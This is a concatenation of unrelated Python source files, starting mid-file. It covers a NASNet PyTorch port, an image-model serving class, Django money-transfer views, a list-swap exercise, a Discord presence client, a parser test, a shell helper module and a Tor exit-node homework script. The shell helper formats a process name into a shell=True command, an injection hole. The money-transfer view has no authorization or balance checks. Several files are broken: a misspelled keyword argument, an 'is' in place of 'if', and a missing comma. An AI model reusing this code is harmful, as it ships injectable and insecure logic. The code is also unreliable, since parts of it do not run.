x_comb_iter_2_right = self.comb_iter_2_right(x_left)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class NASNetALarge(nn.Module):
def __init__(self, num_classes=1001, aux_logits=True, transform_input=True):
super(NASNetALarge, self).__init__()
self.num_classes = num_classes
self.aux_logits = aux_logits
self.transform_input = transform_input
self.conv0 = nn.Sequential()
self.conv0.add_module('conv', nn.Conv2d(in_channels=3, out_channels=96, kernel_size=3, padding=0, stride=2,
bias=False))
self.conv0.add_module('bn', nn.BatchNorm2d(96, eps=0.001, momentum=0.1, affine=True))
self.cell_stem_0 = CellStem0()
self.cell_stem_1 = CellStem1()
self.cell_0 = FirstCell(in_channels_left=168, out_channels_left=84,
in_channels_right=336, out_channels_right=168)
self.cell_1 = NormalCell(in_channels_left=336, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_2 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_3 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_4 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.cell_5 = NormalCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1008, out_channels_right=168)
self.reduction_cell_0 = ReductionCell0(in_channels_left=1008, out_channels_left=336,
in_channels_right=1008, out_channels_right=336)
self.cell_6 = FirstCell(in_channels_left=1008, out_channels_left=168,
in_channels_right=1344, out_channels_right=336)
self.cell_7 = NormalCell(in_channels_left=1344, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_8 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_9 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_10 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.cell_11 = NormalCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2016, out_channels_right=336)
self.reduction_cell_1 = ReductionCell1(in_channels_left=2016, out_channels_left=672,
in_channels_right=2016, out_channels_right=672)
self.cell_12 = FirstCell(in_channels_left=2016, out_channels_left=336,
in_channels_right=2688, outt_channels_right=672)
self.cell_13 = NormalCell(in_channels_left=2688, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_14 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_15 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_16 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.cell_17 = NormalCell(in_channels_left=4032, out_channels_left=672,
in_channels_right=4032, out_channels_right=672)
self.relu = nn.ReLU()
self.avgpool = nn.AvgPool2d(11, stride=1, padding=0)
self.dropout = nn.Dropout()
self.linear = nn.Linear(4032, self.num_classes)
def features(self, x):
if self.transform_input:
x = x.clone()
x[:, 0] = x[:, 0] * (0.229 / 0.5) + (0.485 - 0.5) / 0.5
x[:, 1] = x[:, 1] * (0.224 / 0.5) + (0.456 - 0.5) / 0.5
x[:, 2] = x[:, 2] * (0.225 / 0.5) + (0.406 - 0.5) / 0.5
x_conv0 = self.conv0(x)
x_stem_0 = self.cell_stem_0(x_conv0)
x_stem_1 = self.cell_stem_1(x_conv0, x_stem_0)
x_cell_0 = self.cell_0(x_stem_1, x_stem_0)
x_cell_1 = self.cell_1(x_cell_0, x_stem_1)
x_cell_2 = self.cell_2(x_cell_1, x_cell_0)
x_cell_3 = self.cell_3(x_cell_2, x_cell_1)
x_cell_4 = self.cell_4(x_cell_3, x_cell_2)
x_cell_5 = self.cell_5(x_cell_4, x_cell_3)
x_reduction_cell_0 = self.reduction_cell_0(x_cell_5, x_cell_4)
x_cell_6 = self.cell_6(x_reduction_cell_0, x_cell_4)
x_cell_7 = self.cell_7(x_cell_6, x_reduction_cell_0)
x_cell_8 = self.cell_8(x_cell_7, x_cell_6)
x_cell_9 = self.cell_9(x_cell_8, x_cell_7)
x_cell_10 = self.cell_10(x_cell_9, x_cell_8)
x_cell_11 = self.cell_11(x_cell_10, x_cell_9)
x_reduction_cell_1 = self.reduction_cell_1(x_cell_11, x_cell_10)
x_cell_12 = self.cell_12(x_reduction_cell_1, x_cell_10)
x_cell_13 = self.cell_13(x_cell_12, x_reduction_cell_1)
x_cell_14 = self.cell_14(x_cell_13, x_cell_12)
x_cell_15 = self.cell_15(x_cell_14, x_cell_13)
x_cell_16 = self.cell_16(x_cell_15, x_cell_14)
x_cell_17 = self.cell_17(x_cell_16, x_cell_15)
return x_cell_17
def classifier(self, x):
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.dropout(x)
x = self.linear(x)
return x
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
def build_and_save_model(path):
path_weights = os.path.join(path, 'weights', 'NASNet-A_Large_331')
model = NASNetALarge()
state_dict = load(path_weights)
model.load_state_dict(state_dict)
filename_model = os.path.join(path, 'pytorch', 'nasnet_a_large.pth')
os.system('mkdir -p '+path+'/pytorch')
torch.save(model.state_dict(), filename_model)
return model
def main():
#path = '/local/durandt/tmp/models'
path = '/tmp/tf-models'
#path = '/Users/thibaut/Documents/lip6/project/tmp/models'
model = build_and_save_model(path)
model.transform_input = False
model.eval()
print(model)
input = torch.autograd.Variable(torch.ones(1, 3, 331, 331))
output = model.forward(input)
print('output', output)
if __name__ == '__main__':
main()
|
"""
Script for serving.
"""
import torch
from bedrock_client.bedrock.model import BaseModel
from PIL import Image
from torchvision.models import resnet50
from torchvision.transforms import CenterCrop, Compose, Normalize, Resize, ToTensor
class Model(BaseModel):
def __init__(self):
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = resnet50(pretrained=True)
self.model.to(self.device)
self.model.eval()
self.transform = Compose(
[
Resize(256),
CenterCrop(224),
ToTensor(),
Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]
)
def pre_process(self, files, http_body=None):
img = Image.open(files["image"]).convert("RGB")
features = self.transform(img).unsqueeze_(0).to(self.device)
return features
def predict(self, features):
return self.model(features).max(1)[1].tolist()
|
from django.shortcuts import render, redirect
from . import forms
from . import models
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib import messages
from django.contrib.auth import update_session_auth_hash
from profiles.models import Status
import random
def randomGen():
# return a 6 digit random number
return int(random.uniform(100000, 999999))
def index(request):
try:
curr_user = Status.objects.get(user_name=request.user) # getting details of current user
except:
# if no details exist (new user), create new details
curr_user = Status()
curr_user.account_number = randomGen() # random account number for every new user
curr_user.balance = 0
curr_user.user_name = request.user
curr_user.save()
return render(request, "profiles/profile.html", {"curr_user": curr_user})
def money_transfer(request):
if request.method == "POST":
form = forms.MoneyTransferForm(request.POST)
if form.is_valid():
form.save()
curr_user = models.MoneyTransfer.objects.get(enter_your_user_name=request.user)
dest_user_acc_num = curr_user.enter_the_destination_account_number
temp = curr_user # NOTE: Delete this instance once money transfer is done
dest_user = models.Status.objects.get(account_number=dest_user_acc_num) # FIELD 1
transfer_amount = curr_user.enter_the_amount_to_be_transferred_in_INR # FIELD 2
curr_user = models.Status.objects.get(user_name=request.user) # FIELD 3
# Now transfer the money!
curr_user.balance = curr_user.balance - transfer_amount
dest_user.balance = dest_user.balance + transfer_amount
# Save the changes before redirecting
curr_user.save()
dest_user.save()
temp.delete() # NOTE: Now deleting the instance for future money transactions
return redirect("profiles/profile.html")
else:
form = forms.MoneyTransferForm()
return render(request, "profiles/money_transfer.html", {"form": form})
def settings(request):
return render(request, "profiles/settings.html")
def edit_details(request):
if request.method == "POST":
# POST actions for BasicDetailsForms
try:
curr_user = models.BasicDetails.objects.get(user_name=request.user)
form = forms.BasicDetailsForm(request.POST, instance=curr_user)
if form.is_valid():
form.save()
except:
form = forms.BasicDetailsForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.user_name = request.user
form.save()
# POST actions for PresentLocationForm
try:
curr_user = models.PresentLocation.objects.get(user_name=request.user)
form = forms.PresentLocationForm(request.POST, instance=curr_user)
if form.is_valid():
form.save()
except:
form = forms.PresentLocationForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.user_name = request.user
form.save()
# POST actions for Password change
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('change_password')
else:
messages.error(request, 'Please correct the error below.')
return redirect("profiles/edit_details.html")
else: # GET actions
try:
curr_user = models.BasicDetails.objects.get(user_name=request.user)
form1 = forms.BasicDetailsForm(instance=curr_user) # basic details
except:
form1 = forms.BasicDetailsForm()
try:
curr_user = models.PresentLocation.objects.get(user_name=request.user)
form2 = forms.PresentLocationForm(instance=curr_user) # location
except:
form2 = forms.PresentLocationForm()
# change password
form3 = PasswordChangeForm(request.user)
dici = {"form1": form1, "form2": form2, "form3": form3}
return render(request, "profiles/edit_details.html", dici)
def delete_account(request):
return render(request, "profiles/delete_account.html")
|
"""
Two possible solutions.
One alters the list you used in the function call. If you do not
want this behavior; for instance you want to keep your original list while
having a separate swapped version; you need to have the second one.
"""
def swap(alist,index1,index2):
if index1 + 1 > len(alist) or index2 +1 > len(alist):
return None
hold = alist[index1]
alist[index1] = alist[index2]
alist[index2] = hold
return alist
def swap2(a_list,first_index,second_index):
length = len(a_list)
if first_index > length-1 or second_index > length -1:
return None
accum = []
for x in range(length):
if x == first_index:
accum.append(a_list[second_index])
elif x == second_index:
accum.append(a_list[first_index])
else:
accum.append(a_list[x])
return accum
|
from pypresence import Presence
import time
import config
import event_manager
import logger
from string_util import replace_text
from time import sleep
SETTINGS = config.get_config()
client_id = SETTINGS["discord"]['application_id']
connected = False
retries = 0
max_retries = 3
RPC = None
def initialize():
global RPC
global retries
global connected
if retries < max_retries:
try:
logger.info("Attempting to connect to Discord ...")
RPC = Presence(client_id, pipe=0) # Initialize the client class
RPC.connect() # Start the handshake loop
connected = True
logger.info("Connected to Discord")
except Exception as e:
logger.error("Failed to connect to Discord: {}".format(repr(e)))
retries += 1
sleep(1)
initialize()
def update_activity(details, state, large_image=None, large_text=None, small_image=None, small_text=None, buttons=None):
if state == "":
state = None
if large_image == "":
large_image = None
if large_text == "":
large_text = None
if small_image == "":
small_image = None
if small_text == "":
small_text = None
try:
RPC.update(details=details, state=state, start=time.time(), large_image=large_image, large_text=large_text,
small_image=small_image, small_text=small_text, buttons=buttons) # Set the presence
except Exception as e:
logger.error(f"Faild to update Discord status: {e}")
if "reconnect" in SETTINGS["discord"]:
if SETTINGS["discord"]["reconnect"]:
global retries
retries = 0
initialize()
def handle_event(event, action):
if connected:
buttons = None
if "buttons" in action:
buttons = action["buttons"]
update_activity(replace_text(action["details_text"], event.tokens), replace_text(action["state_text"], event.tokens), replace_text(action["large_image"], event.tokens).lower(
), replace_text(action["large_text"], event.tokens), replace_text(action["small_image"], event.tokens).lower(), replace_text(action["small_text"], event.tokens), buttons)
event_manager.subscribers["Discord"] = {}
event_manager.subscribers["Discord"]["initialize"] = lambda: initialize()
event_manager.subscribers["Discord"]["handle_event"] = {
'function': handle_event, 'arg': "args"}
if __name__ == "__main__":
while True:
buttons = [{"label": "Button 1", "url": "https://www.google.com"},
{"label": "Button 2", "url": "https://www.google.com"}]
update_activity("Console", "Game", "segacd", None, None, None, buttons)
time.sleep(100000)
|
# -*- coding: utf-8 -*-
import unittest
from .. import spec
class test_spec(unittest.TestCase):
def test_cmd_parser(self):
cmds = [
(
"zapimage sampy 0 1 10 sampz 2 3 11 100",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"zapimage sampy 0 1 10 100 sampz 2 3 11",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"puzzle sampy 0 1 10 sampz 2 3 11 100",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"mesh sampy 0 1 10 sampz 2 3 11 0.1",
{"time": lambda x: x.to("ms").magnitude == 100},
),
(
"zapline sampy 0 1 10 100",
{"time": lambda x: x.to("ms").magnitude == 100},
),
("ascan sampy 0 1 10 0.1", {"time": lambda x: x.to("ms").magnitude == 100}),
("zapenergy SUM 10 100", {"time": lambda x: x.to("ms").magnitude == 100}),
("zapenergy SUM2 10 100", {"time": lambda x: x.to("ms").magnitude == 100}),
("invalid", {"name": lambda x: x == "unknown"}),
]
p = spec.cmd_parser()
for cmd, checks in cmds:
r = p.parse(cmd)
for k, func in checks.items():
self.assertTrue(func(r[k]))
def test_suite():
"""Test suite including all test suites"""
testSuite = unittest.TestSuite()
testSuite.addTest(test_spec("test_cmd_parser"))
return testSuite
if __name__ == "__main__":
import sys
mysuite = test_suite()
runner = unittest.TextTestRunner()
if not runner.run(mysuite).wasSuccessful():
sys.exit(1)
|
# Provides useful functions
import os
import sys
import argparse
import subprocess
import signal
# Default arguments
ex_parser = argparse.ArgumentParser()
ex_parser.add_argument("-V", "--version",action="store_true", help="Show version")
ex_parser.add_argument("-q", "--quiet", action="store_true", help="Disable output")
ex_parser.add_argument("--no-color", action="store_true", help="Disable colored output")
ex_parser.add_argument("--dry-run", action="store_true", help="Run without making changes")
ex_parser.add_argument("-v", "--verbose", action="store_true", help="Show verbose output")
ex_parser.add_argument("-d", "--debug", action="store_true", help="Show debug output")
ex_parser.add_argument("--no-warn", action="store_true", help="Disable warnings")
ex_parser.add_argument("--no-error", action="store_true", help="Disable errors")
# Allow the user to define more arguments in the main script.
options, args = ex_parser.parse_known_args()
# Bash Terminal Colors
bcolors = {
"red" : "\033[31m",
"green" : "\033[32m",
"yellow" : "\033[33m",
"blue" : "\033[34m",
"purple" : "\033[35m",
"cyan" : "\033[36m",
"normal" : "\033[0m"
}
# Instead of checking the args on every call, check once
# and if it shouldn't run, define it as a do nothing function.
# Modifying flags during the running of the program will no
# re-enable these functions.
if options.quiet:
def print_color(*args, **kwargs):
pass
elif options.no_color:
def print_color(*args, **kwargs):
for arg in args:
print(arg)
else:
def print_color(*args, color="normal"):
# Get color or default to normal.
color = bcolors.get(color, bcolors["normal"])
for arg in args:
print(color + arg + bcolors["normal"])
# FYI, these functions depend on print_color
if options.verbose:
def print_verbose(*args):
for arg in args:
print_color("VERBOSE: {}".format(arg), color="normal")
else:
def print_verbose(*args):
pass
if options.debug:
def print_debug(*args):
for arg in args:
print_color("DEBUG: {}".format(arg), color="cyan")
else:
def print_debug(*args):
pass
if options.no_warn:
def print_warn(*args):
pass
else:
def print_warn(*args):
for arg in args:
print_color("WARN: {}".format(arg), color="yellow")
if options.no_error:
def print_error(*args):
pass
else:
def print_error(*args):
for arg in args:
print_color("ERROR: {}".format(arg), color="red")
# Version Check
def RequireVersion(version):
if sys.version_info[0] < version:
print_error("Python {} or higher is required.".format(version))
sys.exit(1)
# Root Check
def require_root():
if (os.geteuid() != 0):
print_error("This script must be run as root")
sys.exit(-1)
def require_file(path, type="file", provider="none"):
"""
Checks if a required file is present.
Allows additional information such as filetype (file, deb, csv)
and provider (apt, github)
"""
if not os.path.isfile(path):
print_error("File Required: {}".format(path))
sys.exit(-1)
def require_single_instance(process_name):
"""
Checks if a process of the same name already exists and terminates if one does.
"""
# Restrict results to only python processes
child = subprocess.Popen("""pgrep -lf python |
grep {} |
grep -v grep |
grep -v {}""".format(process_name, os.getpid())
shell=True, stdout=subprocess.PIPE)
child.communicate()[0]
if (child.returncode == 0):
print_warn("Process already running. Terminating.")
sys.exit(-1)
def lock_file(path, message=os.getpid()):
lockfile = "{0}.lock".format(path)
if not os.path.isfile(lockfile):
try:
f = open(lockfile, "w")
f.write(str(message))
f.close()
except OSError as e:
print_error(e)
else:
print_warn("Lockfile already exists")
def unlock_file(path):
lockfile = "{0}.lock".format(path)
is os.path.isfile(lockfile):
try:
os.remove(lockfile)
except OSError as e:
print_error(e)
def test_lockfile(path):
lockfile = "{0}.lock".format(path)
if os.path.isfile(lockfile):
return True
else:
return False
class GracefulKiller:
"""
Ref: https://stackoverflow.com/a/31464349/5339918/
Catches terminations and interrupts that can be tested for
at regular intervals and allow graceful process shutdown.
"""
kill_now = False
warn = False
def __init__(self, warn=False):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
self.warn = warn
def exit_gracefully(self, signum, frame):
if self.warn:
print_warn("Termination signal caught. Stopping...")
self.kill_now = True
|
import io
import pycurl
from time import gmtime, strftime
import stem.process
from stem.util import term
# reference: https://stem.torproject.org/tutorials/to_russia_with_love.html
SOCKS_PORT = 7000
# generated by 1.3.2_find_exitnodes.py
countries_with_exit_node = ['us', 'de', 'ch', 'ru', 'no', 'at', 'se', 'nl', 'bg', 'fr', 'be', 'sg', 'ua', 'vn', 'lu', 'mx', 'lt', 'vg', 'jp', 'es', 'ca', 'sk', 'ee', 'hu', 'am', 'lv', 'gr', 'tw', 'fi', 'gb', 'kw', 'is', 'ro', 'cz', 'tr', 'hk', 'md', 'ar', 'pl', 'gt', 'in', 'sa', 'id', 'br', 'au', 'pa', 'nz', 'si', 'dk', 'za', 'pt', 'hr', 'it', 'kz', 'lr', 'ie', 'eg', 'kr']
url = "http://dogo.ece.cmu.edu/tor-homework/secret/"
def query(country):
output = io.BytesIO()
# connect to webserver with pycurl
query = pycurl.Curl()
query.setopt(pycurl.URL, url)
query.setopt(pycurl.PROXY, 'localhost')
query.setopt(pycurl.PROXYPORT, SOCKS_PORT)
query.setopt(pycurl.PROXYTYPE, pycurl.PROXYTYPE_SOCKS5_HOSTNAME)
query.setopt(pycurl.WRITEFUNCTION, output.write)
try:
query.perform()
# get http code, should be either 403 or 200
code = query.getinfo(pycurl.HTTP_CODE)
# get current time
t = strftime("%a, %d %b %Y %H:%M:%S", gmtime())
if (code == 200):
# output country name and time once get 200 response code
print "Country:%s verified at %s" % (country, t)
return
# query failed with exception
except pycurl.error as exc:
return
# print bootstrap info
def print_bootstrap_lines(line):
if "Bootstrapped " in line:
return
# traverse all countries with exit node
for country in countries_with_exit_node:
try:
# Start tor instance with given exit node country
tor_process = stem.process.launch_tor_with_config(
config = {
'SocksPort': str(SOCKS_PORT),
'ExitNodes': ('{' + country + '}'),
},
init_msg_handler = print_bootstrap_lines,
)
# run query
query(country)
# Stop tor instance
tor_process.kill()
except:
continue
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.